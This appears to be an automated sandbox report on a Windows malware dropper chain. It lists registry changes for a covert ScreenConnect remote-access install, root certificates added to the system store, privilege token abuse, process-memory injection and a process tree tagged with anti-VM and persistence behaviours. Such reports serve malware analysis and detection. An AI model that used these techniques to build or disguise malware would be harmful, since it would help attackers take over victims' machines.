description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8\ProductName = "ScreenConnect Client (73a0227d089fe193)" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8\ProductIcon = "C:\\Windows\\Installer\\{BF338381-FA8C-4707-BAB5-F07F740C9A8B}\\DefaultIcon" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8\SourceList\PackageName = "setup.msi" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-73a0227d089fe193\UseOriginalUrlEncoding = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-73a0227d089fe193 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\183833FBC8AF7074AB5B0FF747C0A9B8 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8\PackageCode = "F48DBF0AC22723B4A887A81CAFC45ABF" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-F729-E0B76340D43B}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-F729-E0B76340D43B}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (73a0227d089fe193)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-73a0227d089fe193\shell\open\command msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-73a0227d089fe193\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (73a0227d089fe193)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-F729-E0B76340D43B} msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8\Version = "386007049" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8\AdvertiseFlags = "388" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\F69B68EBC5C7E714370A22D780F91E39\183833FBC8AF7074AB5B0FF747C0A9B8 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-73a0227d089fe193 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-73a0227d089fe193\shell msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\F69B68EBC5C7E714370A22D780F91E39 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-73a0227d089fe193\URL Protocol msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-73a0227d089fe193\shell\open msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8\SourceList\Media msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-73a0227d089fe193\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-F729-E0B76340D43B}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\183833FBC8AF7074AB5B0FF747C0A9B8\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-F729-E0B76340D43B}\ = "ScreenConnect Client (73a0227d089fe193) Credential Provider" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\183833FBC8AF7074AB5B0FF747C0A9B8\Full msiexec.exe -
Modifies system certificate store 2 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 Bjkm5hE.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a Bjkm5hE.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a Bjkm5hE.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 axplong.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e axplong.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e axplong.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 2856 ScreenConnect.WindowsClient.exe 2256 ScreenConnect.WindowsClient.exe -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 2744 random.exe 2772 axplong.exe 2816 90c94e737e.exe 2784 74d6db97b4.exe 1256 skotes.exe 2044 Bjkm5hE.exe 2500 1AWhJsY.exe 2500 1AWhJsY.exe 2500 1AWhJsY.exe 2500 1AWhJsY.exe 2044 Bjkm5hE.exe 2044 Bjkm5hE.exe 952 chrome.exe 952 chrome.exe 2044 Bjkm5hE.exe 528 msiexec.exe 528 msiexec.exe 2228 ScreenConnect.ClientService.exe 2228 ScreenConnect.ClientService.exe 2228 ScreenConnect.ClientService.exe 2228 ScreenConnect.ClientService.exe 2228 ScreenConnect.ClientService.exe 2228 ScreenConnect.ClientService.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 952 chrome.exe Token: SeShutdownPrivilege 952 chrome.exe Token: SeShutdownPrivilege 952 chrome.exe Token: SeShutdownPrivilege 952 chrome.exe Token: SeShutdownPrivilege 952 chrome.exe Token: SeShutdownPrivilege 952 chrome.exe Token: SeShutdownPrivilege 952 chrome.exe Token: SeShutdownPrivilege 952 chrome.exe Token: SeShutdownPrivilege 952 chrome.exe Token: SeShutdownPrivilege 952 chrome.exe Token: SeShutdownPrivilege 952 chrome.exe Token: SeShutdownPrivilege 952 chrome.exe Token: SeDebugPrivilege 2880 cBeNU75.exe Token: SeShutdownPrivilege 1844 msiexec.exe Token: SeIncreaseQuotaPrivilege 1844 msiexec.exe Token: SeRestorePrivilege 528 msiexec.exe Token: SeTakeOwnershipPrivilege 528 msiexec.exe Token: SeSecurityPrivilege 528 msiexec.exe Token: SeCreateTokenPrivilege 1844 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1844 msiexec.exe Token: SeLockMemoryPrivilege 1844 msiexec.exe Token: SeIncreaseQuotaPrivilege 1844 msiexec.exe Token: SeMachineAccountPrivilege 1844 msiexec.exe Token: SeTcbPrivilege 1844 msiexec.exe Token: SeSecurityPrivilege 1844 msiexec.exe Token: SeTakeOwnershipPrivilege 1844 msiexec.exe Token: SeLoadDriverPrivilege 1844 msiexec.exe Token: SeSystemProfilePrivilege 1844 msiexec.exe Token: SeSystemtimePrivilege 1844 msiexec.exe Token: SeProfSingleProcessPrivilege 1844 msiexec.exe Token: SeIncBasePriorityPrivilege 1844 msiexec.exe Token: SeCreatePagefilePrivilege 1844 msiexec.exe Token: SeCreatePermanentPrivilege 1844 msiexec.exe Token: SeBackupPrivilege 1844 msiexec.exe Token: SeRestorePrivilege 1844 msiexec.exe Token: SeShutdownPrivilege 1844 msiexec.exe Token: SeDebugPrivilege 1844 msiexec.exe Token: SeAuditPrivilege 1844 msiexec.exe Token: SeSystemEnvironmentPrivilege 1844 msiexec.exe Token: SeChangeNotifyPrivilege 1844 msiexec.exe Token: SeRemoteShutdownPrivilege 1844 msiexec.exe Token: SeUndockPrivilege 1844 msiexec.exe Token: SeSyncAgentPrivilege 1844 msiexec.exe Token: SeEnableDelegationPrivilege 1844 msiexec.exe Token: SeManageVolumePrivilege 1844 msiexec.exe Token: SeImpersonatePrivilege 1844 msiexec.exe Token: SeCreateGlobalPrivilege 1844 msiexec.exe Token: SeCreateTokenPrivilege 1844 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1844 msiexec.exe Token: SeLockMemoryPrivilege 1844 msiexec.exe Token: SeIncreaseQuotaPrivilege 1844 msiexec.exe Token: SeMachineAccountPrivilege 1844 msiexec.exe Token: SeTcbPrivilege 1844 msiexec.exe Token: SeSecurityPrivilege 1844 msiexec.exe Token: SeTakeOwnershipPrivilege 1844 msiexec.exe Token: SeLoadDriverPrivilege 1844 msiexec.exe Token: SeSystemProfilePrivilege 1844 msiexec.exe Token: SeSystemtimePrivilege 1844 msiexec.exe Token: SeProfSingleProcessPrivilege 1844 msiexec.exe Token: SeIncBasePriorityPrivilege 1844 msiexec.exe Token: SeCreatePagefilePrivilege 1844 msiexec.exe Token: SeCreatePermanentPrivilege 1844 msiexec.exe Token: SeBackupPrivilege 1844 msiexec.exe Token: SeRestorePrivilege 1844 msiexec.exe -
Suspicious use of FindShellTrayWindow 38 IoCs
pid Process 2744 random.exe 2784 74d6db97b4.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 952 chrome.exe 1844 msiexec.exe 1844 msiexec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2744 wrote to memory of 2772 2744 random.exe 30 PID 2744 wrote to memory of 2772 2744 random.exe 30 PID 2744 wrote to memory of 2772 2744 random.exe 30 PID 2744 wrote to memory of 2772 2744 random.exe 30 PID 2772 wrote to memory of 2816 2772 axplong.exe 33 PID 2772 wrote to memory of 2816 2772 axplong.exe 33 PID 2772 wrote to memory of 2816 2772 axplong.exe 33 PID 2772 wrote to memory of 2816 2772 axplong.exe 33 PID 2772 wrote to memory of 2784 2772 axplong.exe 34 PID 2772 wrote to memory of 2784 2772 axplong.exe 34 PID 2772 wrote to memory of 2784 2772 axplong.exe 34 PID 2772 wrote to memory of 2784 2772 axplong.exe 34 PID 2784 wrote to memory of 1256 2784 74d6db97b4.exe 35 PID 2784 wrote to memory of 1256 2784 74d6db97b4.exe 35 PID 2784 wrote to memory of 1256 2784 74d6db97b4.exe 35 PID 2784 wrote to memory of 1256 2784 74d6db97b4.exe 35 PID 1256 wrote to memory of 1300 1256 skotes.exe 37 PID 1256 wrote to memory of 1300 1256 skotes.exe 37 PID 1256 wrote to memory of 1300 1256 skotes.exe 37 PID 1256 wrote to memory of 1300 1256 skotes.exe 37 PID 1300 wrote to memory of 2500 1300 1AWhJsY.exe 38 PID 1300 wrote to memory of 2500 1300 1AWhJsY.exe 38 PID 1300 wrote to memory of 2500 1300 1AWhJsY.exe 38 PID 1300 wrote to memory of 2500 1300 1AWhJsY.exe 38 PID 1300 wrote to memory of 2500 1300 1AWhJsY.exe 38 PID 1300 wrote to memory of 2500 1300 1AWhJsY.exe 38 PID 1300 wrote to memory of 2500 1300 1AWhJsY.exe 38 PID 1300 wrote to memory of 2500 1300 1AWhJsY.exe 38 PID 1300 wrote to memory of 2500 1300 1AWhJsY.exe 38 PID 1300 wrote to memory of 2500 1300 1AWhJsY.exe 38 PID 1300 wrote to memory of 2240 1300 1AWhJsY.exe 39 PID 1300 wrote to memory of 2240 1300 1AWhJsY.exe 39 PID 1300 wrote to memory of 2240 1300 1AWhJsY.exe 39 PID 1300 wrote to memory of 2240 1300 1AWhJsY.exe 39 PID 1256 wrote to memory of 2044 1256 skotes.exe 41 PID 1256 wrote to memory of 2044 1256 skotes.exe 41 PID 1256 wrote to memory of 2044 1256 skotes.exe 41 PID 1256 wrote to memory of 2044 1256 skotes.exe 41 PID 2044 wrote to memory of 952 2044 Bjkm5hE.exe 43 PID 2044 wrote to memory of 952 2044 Bjkm5hE.exe 43 PID 2044 wrote to memory of 952 2044 Bjkm5hE.exe 43 PID 2044 wrote to memory of 952 2044 Bjkm5hE.exe 43 PID 952 wrote to memory of 1720 952 chrome.exe 44 PID 952 wrote to memory of 1720 952 chrome.exe 44 PID 952 wrote to memory of 1720 952 chrome.exe 44 PID 952 wrote to memory of 1664 952 chrome.exe 45 PID 952 wrote to memory of 1664 952 chrome.exe 45 PID 952 wrote to memory of 1664 952 chrome.exe 45 PID 952 wrote to memory of 2024 952 chrome.exe 46 PID 952 wrote to memory of 2024 952 chrome.exe 46 PID 952 wrote to memory of 2024 952 chrome.exe 46 PID 952 wrote to memory of 2024 952 chrome.exe 46 PID 952 wrote to memory of 2024 952 chrome.exe 46 PID 952 wrote to memory of 2024 952 chrome.exe 46 PID 952 wrote to memory of 2024 952 chrome.exe 46 PID 952 wrote to memory of 2024 952 chrome.exe 46 PID 952 wrote to memory of 2024 952 chrome.exe 46 PID 952 wrote to memory of 2024 952 chrome.exe 46 PID 952 wrote to memory of 2024 952 chrome.exe 46 PID 952 wrote to memory of 2024 952 chrome.exe 46 PID 952 wrote to memory of 2024 952 chrome.exe 46 PID 952 wrote to memory of 2024 952 chrome.exe 46 PID 952 wrote to memory of 2024 952 chrome.exe 46 PID 952 wrote to memory of 2024 952 chrome.exe 46 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Users\Admin\AppData\Local\Temp\1019175001\90c94e737e.exe"C:\Users\Admin\AppData\Local\Temp\1019175001\90c94e737e.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2816
-
-
C:\Users\Admin\AppData\Local\Temp\1019176001\74d6db97b4.exe"C:\Users\Admin\AppData\Local\Temp\1019176001\74d6db97b4.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1256 -
